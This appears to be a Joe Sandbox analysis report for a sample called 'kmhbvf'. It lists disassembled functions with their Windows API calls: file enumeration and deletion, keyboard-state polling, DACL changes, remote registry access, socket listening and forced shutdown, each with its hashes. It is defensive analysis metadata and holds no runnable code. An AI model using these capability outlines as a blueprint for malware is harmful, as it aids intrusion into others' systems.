REG_EXPAND_SZ, xrefs: 00F5108F
REG_SZ, xrefs: 00F51130
REG_BINARY, xrefs: 00F513AD
REG_DWORD, xrefs: 00F512E3
REG_MULTI_SZ, xrefs: 00F511DA
REG_QWORD, xrefs: 00F51360

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 1bfe8799cc5d0d09c2922b7e2f3ce325225118e365ab902b9df270baa64e704d
Instruction ID: b6300f46f851de4de174bc770f3d41e28a9c8aeb0e6042a92995a712aef4ebe1
Opcode Fuzzy Hash: 1bfe8799cc5d0d09c2922b7e2f3ce325225118e365ab902b9df270baa64e704d
Instruction Fuzzy Hash: 38027A716006019FCB14EF25C845E2AB7E5FF89720F04895DF95AAB3A2CB30EC45DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F3F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74CB61D0,?,00000000), ref: 00F3F756
_wcscmp.LIBCMT ref: 00F3F76B
_wcscmp.LIBCMT ref: 00F3F782

Part of subcall function 00F34875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F34890

FindNextFileW.KERNEL32(00000000,?), ref: 00F3F7B1
FindClose.KERNEL32(00000000), ref: 00F3F7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 00F3F7D8
_wcscmp.LIBCMT ref: 00F3F7FF
_wcscmp.LIBCMT ref: 00F3F816
SetCurrentDirectoryW.KERNEL32(?), ref: 00F3F828
SetCurrentDirectoryW.KERNEL32(00F8B578), ref: 00F3F846
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F3F850
FindClose.KERNEL32(00000000), ref: 00F3F85D
FindClose.KERNEL32(00000000), ref: 00F3F86F

Strings

*.*, xrefs: 00F3F7D3

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 6949187e9bab91ea5eeec7540add62d4f5b235b3619eef206b54abd6d66625d0
Instruction ID: bbaed91d0ab2f8a1eb2b3da2c809ca46e4100b9d6adc049b35c60a3aee668ce7
Opcode Fuzzy Hash: 6949187e9bab91ea5eeec7540add62d4f5b235b3619eef206b54abd6d66625d0
Instruction Fuzzy Hash: 3E31D472D4021EAADB14AFB4DC48AEF77AC9F09330F240165E914A21A1DB70DE49AB64

Uniqueness

Uniqueness Score: -1.00%

Function 00F288CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F28E20: GetUserObjectSecurity.USER32 ref: 00F28E3C
Part of subcall function 00F28E20: GetLastError.KERNEL32(?,00F28900,?,?,?), ref: 00F28E46
Part of subcall function 00F28E20: GetProcessHeap.KERNEL32(00000008,?,?,00F28900,?,?,?), ref: 00F28E55
Part of subcall function 00F28E20: HeapAlloc.KERNEL32(00000000,?,00F28900,?,?,?), ref: 00F28E5C
Part of subcall function 00F28E20: GetUserObjectSecurity.USER32 ref: 00F28E73

Part of subcall function 00F28EBD: GetProcessHeap.KERNEL32(00000008,00F28916,00000000,00000000,?,00F28916,?), ref: 00F28EC9
Part of subcall function 00F28EBD: HeapAlloc.KERNEL32(00000000,?,00F28916,?), ref: 00F28ED0
Part of subcall function 00F28EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F28916,?), ref: 00F28EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F28931
_memset.LIBCMT ref: 00F28946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F28965
GetLengthSid.ADVAPI32(?), ref: 00F28976
GetAce.ADVAPI32(?,00000000,?), ref: 00F289B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F289CF
GetLengthSid.ADVAPI32(?), ref: 00F289EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F289FB
HeapAlloc.KERNEL32(00000000), ref: 00F28A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F28A23
CopySid.ADVAPI32(00000000), ref: 00F28A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F28A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F28A81
SetUserObjectSecurity.USER32 ref: 00F28A95

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 4abc2144b49778a5562d9d5240c6e8015f1b24ad7802335cf9dc105a81314800
Instruction ID: 6962407765215d6d2f7c4d5fa366a781ef4865c50dc4583d88467f14e9c47f51
Opcode Fuzzy Hash: 4abc2144b49778a5562d9d5240c6e8015f1b24ad7802335cf9dc105a81314800
Instruction Fuzzy Hash: 16615A71901119FFDF00DFA1EC45AAEBB79FF04350F14811AE825AA290DF759A06EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F50A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5040D,?,?), ref: 00F51491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F50B0C

Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F50BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F50C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F50E82
RegCloseKey.ADVAPI32(00000000), ref: 00F50E8F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 635f582339e2133981ee42d209fffd1818d2953a288da2217ea297a684d2f6f8
Instruction ID: b96da9ddad910240bddf021c311a446104a049027efb9adf8b1d7b9294ea8c30
Opcode Fuzzy Hash: 635f582339e2133981ee42d209fffd1818d2953a288da2217ea297a684d2f6f8
Instruction Fuzzy Hash: 3BE19B71604214AFCB14DF28C895E2BBBE9EF89314F14896DF94ADB2A1DB30EC05DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F30508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00F30530
GetAsyncKeyState.USER32(000000A0), ref: 00F305B1
GetKeyState.USER32 ref: 00F305CC
GetAsyncKeyState.USER32(000000A1), ref: 00F305E6
GetKeyState.USER32 ref: 00F305FB
GetAsyncKeyState.USER32(00000011), ref: 00F30613
GetKeyState.USER32 ref: 00F30625
GetAsyncKeyState.USER32(00000012), ref: 00F3063D
GetKeyState.USER32 ref: 00F3064F
GetAsyncKeyState.USER32(0000005B), ref: 00F30667
GetKeyState.USER32 ref: 00F30679

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: d460cb7aef3022fb3ecb375622db306db8284f3f166148a2ddccec6f18fd6cb3
Instruction ID: f943ef0146ce4021449bd2b18099f33ba04d3a16f181611356d28ead7c02368f
Opcode Fuzzy Hash: d460cb7aef3022fb3ecb375622db306db8284f3f166148a2ddccec6f18fd6cb3
Instruction Fuzzy Hash: 9341B320D047CA6DFF718A6488257B6BEA06B51334F0C405BD5C6475C2EFE499D8EFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F3443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00F34451
__swprintf.LIBCMT ref: 00F3445E

Part of subcall function 00EF38C8: __woutput_l.LIBCMT ref: 00EF3921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00F34488
LoadResource.KERNEL32(?,00000000), ref: 00F34494
LockResource.KERNEL32(00000000), ref: 00F344A1
FindResourceW.KERNEL32(?,?,00000003), ref: 00F344C1
LoadResource.KERNEL32(?,00000000), ref: 00F344D3
SizeofResource.KERNEL32(?,00000000), ref: 00F344E2
LockResource.KERNEL32(?), ref: 00F344EE
CreateIconFromResourceEx.USER32 ref: 00F3454F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: f09294e2108e99a1c400675ec498e412a2951b31df758e61005a5fac23b8c8b1
Instruction ID: 63867d61963d25117768fe66792b72fd773d16efbc5b01a3dc0455afd88dab83
Opcode Fuzzy Hash: f09294e2108e99a1c400675ec498e412a2951b31df758e61005a5fac23b8c8b1
Instruction Fuzzy Hash: AC31CF7190121EABCB159F60EC58ABF7BA8EF04360F184465F926D2150DB74FA11EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F33CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE2A58,?,00008000), ref: 00EF02A4

Part of subcall function 00F34FEC: GetFileAttributesW.KERNEL32(?,00F33BFE), ref: 00F34FED

FindFirstFileW.KERNEL32(?,?), ref: 00F33D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F33E3E
MoveFileW.KERNEL32(?,?), ref: 00F33E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F33E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F33E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F33EAC

Strings

\*.*, xrefs: 00F33D41, 00F33D4A, 00F33D5F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: f2acff18431dae63e6e5915a49e779a90a0c1566658f730576e993b6f1363b99
Instruction ID: 21d1d0e65cb5551e4dad5ad1e506ea1dc9f8257d0a4deab833e18ced75f12b9f
Opcode Fuzzy Hash: f2acff18431dae63e6e5915a49e779a90a0c1566658f730576e993b6f1363b99
Instruction Fuzzy Hash: 5C516E3180114DAACF15EBA1CD929EDB7B9AF14311F2001A9E452B7192EF356F8DEB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F3FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F3FA83
FindClose.KERNEL32(00000000), ref: 00F3FB96

Part of subcall function 00ED52B0: PeekMessageW.USER32 ref: 00ED52E6

Sleep.KERNEL32(0000000A), ref: 00F3FAB3
_wcscmp.LIBCMT ref: 00F3FAC7
_wcscmp.LIBCMT ref: 00F3FAE2
FindNextFileW.KERNEL32(?,?), ref: 00F3FB80

Strings

*.*, xrefs: 00F3FA68

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: 7232ceb2be10d8ff816f587e37d6a4ecb77cc20c455002eb9fa924d26e3e374c
Instruction ID: c7ff49dac1d58508852ddddb8535ce640240f0e2880f9fd718bec543144981f8
Opcode Fuzzy Hash: 7232ceb2be10d8ff816f587e37d6a4ecb77cc20c455002eb9fa924d26e3e374c
Instruction Fuzzy Hash: C9415EB1D4021E9FCF14DF64CC59AEEBBB5FF45360F244566E814A22A1EB309A88DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F34005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE2A58,?,00008000), ref: 00EF02A4

Part of subcall function 00F34FEC: GetFileAttributesW.KERNEL32(?,00F33BFE), ref: 00F34FED

FindFirstFileW.KERNEL32(?,?), ref: 00F3407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 00F340CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F340DD
FindClose.KERNEL32(00000000), ref: 00F340F4
FindClose.KERNEL32(00000000), ref: 00F340FD

Strings

\*.*, xrefs: 00F3404E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 2c8ea3c95ec539a9c3f3f6708482015215eb6ea8ffb2291e643aadb0bae49604
Instruction ID: ee747b5a97ba44a1c84fcdf997471008dc5f42b7012ea99488e0584e5cd845cf
Opcode Fuzzy Hash: 2c8ea3c95ec539a9c3f3f6708482015215eb6ea8ffb2291e643aadb0bae49604
Instruction Fuzzy Hash: BF31AF710083899BC304EF60C8918AFB7E8BE95324F441E5DF5E193192EB30EA09E763

Uniqueness

Uniqueness Score: -1.00%

Function 00F35778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00F29399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F293E3
Part of subcall function 00F29399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F29410
Part of subcall function 00F29399: GetLastError.KERNEL32 ref: 00F2941D

ExitWindowsEx.USER32(?,00000000), ref: 00F357B4

Strings

@, xrefs: 00F357A7
SeShutdownPrivilege, xrefs: 00F35784
, xrefs: 00F357A2

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 1f06c475b5e948d3e3a31df5c1dd857226e8c0df38376265293e74ceed0a8a16
Instruction ID: 43965cf4cecfdca2020bc74e6887250707e02f5cf7225d465df3609ef444ef4a
Opcode Fuzzy Hash: 1f06c475b5e948d3e3a31df5c1dd857226e8c0df38376265293e74ceed0a8a16
Instruction Fuzzy Hash: 65012B72B5572EEAE72862A4DC8BFBB725CEB84F70F240525F813D21D2DA945C00B160

Uniqueness

Uniqueness Score: -1.00%

Function 00F4696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F469C7
WSAGetLastError.WSOCK32(00000000), ref: 00F469D6
bind.WSOCK32(00000000,?,00000010), ref: 00F469F2
listen.WSOCK32(00000000,00000005), ref: 00F46A01
WSAGetLastError.WSOCK32(00000000), ref: 00F46A1B
closesocket.WSOCK32(00000000,00000000), ref: 00F46A2F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 8bf6a46defe911c50d4db5c2da5bfe76405407259ab429521aac45c732f42b0b
Instruction ID: d608b4cec725ebea2edf191cf489a32a4af2e385dfae439c91ba42c2b262306d
Opcode Fuzzy Hash: 8bf6a46defe911c50d4db5c2da5bfe76405407259ab429521aac45c732f42b0b
Instruction Fuzzy Hash: 2821C1716006049FCB00EF64CC89A6EB7F9EF45720F108559E826A73D1CB74AC01EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00ED1DD6
GetSysColor.USER32(0000000F), ref: 00ED1E2A
SetBkColor.GDI32(?,00000000), ref: 00ED1E3D

Part of subcall function 00ED166C: DefDlgProcW.USER32(?,00000020,?), ref: 00ED16B4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: a3fc68121f12f9504a4a6ad4393115458e9687cd544393507b55b83f28377036
Instruction ID: d0e545cded80d7c74ed562c635b32ff675123f4fafdffef953d2fb420fdd1a2e
Opcode Fuzzy Hash: a3fc68121f12f9504a4a6ad4393115458e9687cd544393507b55b83f28377036
Instruction Fuzzy Hash: 0AA1477011A604BEE6286B695C49EBF369EDB41317B24614BF842F63D1CB249D03F276

Uniqueness

Uniqueness Score: -1.00%

Function 00F3C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F3C329
_wcscmp.LIBCMT ref: 00F3C359
_wcscmp.LIBCMT ref: 00F3C36E
FindNextFileW.KERNEL32(00000000,?), ref: 00F3C37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F3C3AF

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 4b8fe78abc8cd3c7dc264da2cb1eef9efa050c3f4e96bdc840bb54cde06e2b1a
Instruction ID: 2987878654d49b80792772d295c00c9290dbcec169d0ff1aee594b6617751497
Opcode Fuzzy Hash: 4b8fe78abc8cd3c7dc264da2cb1eef9efa050c3f4e96bdc840bb54cde06e2b1a
Instruction Fuzzy Hash: 77518B76A046068FC714DF68D890EAAB3E4FF49320F10465EE956EB3A1DB30ED05DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F46E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F48475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F484A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F46E89
WSAGetLastError.WSOCK32(00000000), ref: 00F46EB2
bind.WSOCK32(00000000,?,00000010), ref: 00F46EEB
WSAGetLastError.WSOCK32(00000000), ref: 00F46EF8
closesocket.WSOCK32(00000000,00000000), ref: 00F46F0C

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 97975a4aecefed1e96f0ad1b1448130ed67807a99c98f33e7fbf22cbf81a17e1
Instruction ID: aeba44ab781907f92ca00ed3e9414c9884c1286d9ae33a673ef3226fae606fe8
Opcode Fuzzy Hash: 97975a4aecefed1e96f0ad1b1448130ed67807a99c98f33e7fbf22cbf81a17e1
Instruction Fuzzy Hash: F541E3B5600214AFDB10AF64DC86F6E77E9DF58710F00845DF916AB3D2DA709D029BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F559B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00F55A02
IsWindowEnabled.USER32 ref: 00F55A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00F55A1D
IsIconic.USER32 ref: 00F55A2B
IsZoomed.USER32 ref: 00F55A39

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
